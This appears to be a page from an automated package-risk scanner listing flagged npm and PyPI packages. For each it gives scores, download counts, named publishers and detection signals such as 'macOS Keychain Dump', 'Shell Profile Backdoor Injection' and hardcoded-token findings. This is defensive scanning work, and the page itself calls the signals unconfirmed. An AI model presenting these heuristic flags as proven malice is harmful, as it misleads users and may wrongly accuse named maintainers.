  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/google.py:75
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/slack.py:80
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/adapters/cli_adapters.py:33
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/agents/agent_loader.py:752
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/google.py:75
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/slack.py:80
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/cli/__init__.py:77
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/cli/chrome_devtools_installer.py:88
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/cli/commands/agent_manager.py:1080
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/cli/commands/agent_manager.py:1077

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
225 186d 15 952 ↑0.1/day
Very Risky
claude npm 0.2.0 🪝 🗄️
Matched naming pattern: node-claude-tray
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 186
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 15/month, 3/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 952 lines, 30.8 kB across 15 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-tray' matches AI hallucination template [node] + [claude] + [tray].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (180 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'chmod +x node_modules/systray2/traybin/tray_darwin_release 2>/dev/null || true'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/bin/claude-tray.js:32 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/claude-tray.js:104
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'chmod +x node_modules/systray2/traybin/tray_darwin_release 2>/dev/null || true'
  • MISSING_SOURCE_REPOSITORY_URL
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/bin/claude-tray.js:32 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/claude-tray.js:104
  • CREDENTIAL_PATH_HARVESTING: 'macOS Keychain Dump' found in package/src/credentials.js:52
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/credentials.js:51 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/usage.js:9

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
220 2047d 175 46 ↑0.1/day
Very Risky
ethereum npm 7.0.0 Animoca Brands 🪝
Claimed homepage: https://github.com/animoca/revv-ethereum-contracts#readme
Matched naming pattern: node-ethereum-revv-ethereum-contracts
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 2047
Registry downloads: 175/month, 43/week (MODERATE_USAGE)
Codebase size: 46 lines, 1.5 kB across 5 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name '@animoca/revv-ethereum-contracts' matches AI hallucination template [node] + [ethereum] + [revv-ethereum-contracts].
  • HIGHClaims critical enterprise brand identity ('ETHEREUM').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 2040 days ago (predates modern AI hallucination waves).
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'bash -c 'for cfg in .vscode/settings.json .vscode/extensions.json .vscode/launch.json; do cp -n ${cfg}.default ${cfg} || :; done''
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'sh -c' in 'postinstall' script
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'bash -c 'for cfg in .vscode/settings.json .vscode/extensions.json .vscode/launch.json; do cp -n ${cfg}.default ${cfg} || :; done''
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'sh -c' in 'postinstall' script

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
215 7d 0 44,625 ↑0.0/day
Very Risky
auto pypi 0.1.0 Ashish Yadav 🪝
Claimed homepage: https://pypi.org/project/auto-use/
Matched naming pattern: python-auto-general
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 7
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 44625 lines, 2.7 MB across 224 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (1 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/__init__.py:52
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in auto_use-0.1.0/Auto_Use/agent_launcher.py:429
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/agent_launcher.py:399
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in auto_use-0.1.0/Auto_Use/frontend/service.py:545
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/frontend/service.py:103
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/ios/agent/__main__.py:58
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/__init__.py:52
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in auto_use-0.1.0/Auto_Use/agent_launcher.py:429
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/agent_launcher.py:399
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in auto_use-0.1.0/Auto_Use/frontend/service.py:545
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/frontend/service.py:103
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/ios/agent/__main__.py:58
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/ios/agent/main_driver/service.py:42
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in auto_use-0.1.0/Auto_Use/ios/controller/scratchpad/service.py:20

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
215 59d 35 1,785 ↑0.6/day
Very Risky
cursor npm 0.2.0 Aiden Hadisi aiden@hadisi.com hadisi.com 🪝 🗄️
Claimed homepage: https://github.com/AidenHadisi/cursor-distill#readme
Matched naming pattern: node-cursor-distill
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 59
Registry downloads: 35/month, 8/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 1785 lines, 84.6 kB across 26 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'cursor-distill' matches AI hallucination template [node] + [cursor] + [distill].
  • HIGHClaims critical enterprise brand identity ('CURSOR').
  • HIGHPublisher email 'aiden@hadisi.com' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (53 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/dist/agent.js:224 (+4 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/agent.js:92 (+1 more occurrence(s) elsewhere)
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/dist/scheduler.js:35
  • CRITICALSOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/dist/scheduler.js
Static code signals:
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/dist/agent.js:224 (+4 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/agent.js:92 (+1 more occurrence(s) elsewhere)
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/dist/scheduler.js:35
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/dist/scheduler.js

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
215 61d 17 302,767 ↑0.3/day
Very Risky
claude npm 0.8.0 🪝 📡
Claimed homepage: https://github.com/akasecurity/ai-tc/tree/main/plugins/claude-code
Matched naming pattern: node-claude-plugin-claude-code
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 61
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 17/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 302767 lines, 11.7 MB across 14 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name '@akasecurity/plugin-claude-code' matches AI hallucination template [node] + [claude] + [plugin-claude-code].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (55 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in package/scripts/backfill.js:24258 (+9 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/scripts/backfill.js:22890 (+9 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/backfill.js:22658 (+10 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in package/scripts/backfill.js:22677 (+9 more occurrence(s) elsewhere)
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in package/scripts/backfill.js:24258 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/scripts/backfill.js:22890 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/backfill.js:22658 (+10 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in package/scripts/backfill.js:22677 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/scripts/backfill.js:22085 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in package/scripts/backfill.js:1990 (+12 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/backfill.js:23097 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/backfill.js:22217 (+10 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
215 179d 9 126,693 ↑0.1/day
Very Risky
vllm pypi 0.17.2.post1 vLLM Team 🪝
Claimed homepage: https://pypi.org/project/vllm-hust/
Matched naming pattern: python-vllm-hust
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 179
Code-only verdict: SUSPICIOUS (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 9/month, 3/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 126693 lines, 5.7 MB across 1606 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'vllm-hust' matches AI hallucination template [python] + [vllm] + [hust].
  • HIGHClaims critical enterprise brand identity ('VLLM').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (172 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/check-wheel-size.py:12
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/performance-benchmarks/scripts/compare-json-results.py:1141
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/backend_request_func.py:223
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/benchmark_batch_invariance.py:108
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/check-wheel-size.py:12
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/performance-benchmarks/scripts/compare-json-results.py:1141
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/backend_request_func.py:223
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/benchmark_batch_invariance.py:108
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/disagg_benchmarks/disagg_prefill_proxy_server.py:125
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/kernels/benchmark_block_fp8_gemm.py:7
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/kernels/benchmark_device_communicators.py:301
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/kernels/benchmark_fused_collective.py:976

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
205 10d 1,122 2,994 ↑112.2/day
Very Risky
pyrecrawl pypi 0.7.5 Alexander Jay 🪝
Claimed homepage: https://pypi.org/project/pyrecrawl/
Matched naming pattern: python-pyrecrawl-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 10
Registry downloads: 1122/month, 833/week (ACTIVE_COMMUNITY_USE)
Codebase size: 2994 lines, 141.5 kB across 10 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (10 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.7.5/scripts/probe_stdio.py:12
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.7.5/scripts/probe_stdio.py:12
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.7.5/scripts/probe_v2.py:19
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.7.5/scripts/probe_v2.py:19
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.7.5/scripts/stats.py:56
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in pyrecrawl-0.7.5/src/pyrecrawl/cli.py:67
Static code signals:
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.7.5/scripts/probe_stdio.py:12
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.7.5/scripts/probe_stdio.py:12
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.7.5/scripts/probe_v2.py:19
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.7.5/scripts/probe_v2.py:19
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.7.5/scripts/stats.py:56
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in pyrecrawl-0.7.5/src/pyrecrawl/cli.py:67
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.7.5/src/pyrecrawl/cli.py:281
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in pyrecrawl-0.7.5/src/pyrecrawl/cli.py:22

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
205 152d 61 2,608 ↑0.4/day
Very Risky
claude npm 1.0.3 Hendrik Mennen 🪝
Claimed homepage: https://github.com/hmennen90/claude-device-sync#readme
Matched naming pattern: claude-claude-sync
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 152
Registry downloads: 61/month, 15/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 2608 lines, 93.2 kB across 45 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (145 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/daemon/checker.js:18 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/config.js:6 (+3 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/commands/daemon.js:23
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/dist/commands/daemon.js:104
  • CRITICALSOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/dist/commands/daemon.js
Static code signals:
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/daemon/checker.js:18 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/config.js:6 (+3 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/commands/daemon.js:23
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/dist/commands/daemon.js:104
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/dist/commands/daemon.js
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/crypto/keychain.js:19 (+1 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
205 481d 868 41,485 ↑1.8/day
Very Risky
llama pypi 0.94.0 Shamit Verma oss@shamit.in shamit.in 🪝
Claimed homepage: https://github.com/shamitv/llama_cpp
Matched naming pattern: llama-llama-pydist
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 481
Registry downloads: 868/month, 199/week (MODERATE_USAGE)
Codebase size: 41485 lines, 2.3 MB across 155 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('LLAMA').
  • HIGHPublisher email 'oss@shamit.in' is not affiliated with official vendor domain.
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_pydist-0.94.0/llama_cpp/convert_model.py:67
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_pydist-0.94.0/llama_cpp/convert_model.py:67
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/vendor_llama_cpp_pydist/llama.cpp/conversion/base.py:26
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/vendor_llama_cpp_pydist/llama.cpp/conversion/bert.py:117
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/vendor_llama_cpp_pydist/llama.cpp/conversion/t5.py:30

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
200 35d 41 1,143 ↑1.2/day
Very Risky
claude npm 0.3.0 Toshon Jennings 🪝
Claimed homepage: https://github.com/toshon-jennings/taste#readme
Matched naming pattern: node-claude-taste
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 35
Registry downloads: 41/month, 10/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 1143 lines, 47.7 kB across 13 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-taste' matches AI hallucination template [node] + [claude] + [taste].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (28 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/hooks/capture.mjs:40 (+2 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/cli.mjs:209
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Shell Profile Backdoor Injection' found in package/src/cli.mjs:206
  • CRITICALSOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/src/cli.mjs
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/hooks/capture.mjs:40 (+2 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/cli.mjs:209
  • SYSTEM_PERSISTENCE_TAMPERING: 'Shell Profile Backdoor Injection' found in package/src/cli.mjs:206
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/src/cli.mjs

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
195 61d 1,150 543,139 ↑18.9/day
Very Risky
claude npm 0.9.10 🪝 📡
Claimed homepage: https://github.com/akasecurity/ai-tc/tree/main/plugins/claude-code
Matched naming pattern: node-claude-ai-tc-claude-code
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 61
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 1150/month, 287/week (ACTIVE_COMMUNITY_USE)
Codebase size: 543139 lines, 21.5 MB across 23 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name '@akasecurity/ai-tc-claude-code' matches AI hallucination template [node] + [claude] + [ai-tc-claude-code].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (55 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in package/scripts/apply-suppressions.js:35037 (+10 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/scripts/apply-suppressions.js:33671 (+10 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/apply-suppressions.js:33433 (+11 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in package/scripts/apply-suppressions.js:33454 (+10 more occurrence(s) elsewhere)
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in package/scripts/apply-suppressions.js:35037 (+10 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/scripts/apply-suppressions.js:33671 (+10 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/apply-suppressions.js:33433 (+11 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in package/scripts/apply-suppressions.js:33454 (+10 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in package/scripts/apply-suppressions.js:1899 (+14 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/apply-suppressions.js:33877 (+10 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/apply-suppressions.js:32335 (+13 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/scripts/backfill.js:32489 (+9 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
195 165d 105 8,550 ↑0.6/day
Very Risky
claude npm 1.6.4 Andre Figueira 🪝
Matched naming pattern: claude-claude-lcars
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 165
Registry downloads: 105/month, 26/week (MODERATE_USAGE)
Codebase size: 8550 lines, 435.3 kB across 9 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (158 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/src/generate.js:6790 (+1 more occurrence(s) elsewhere)
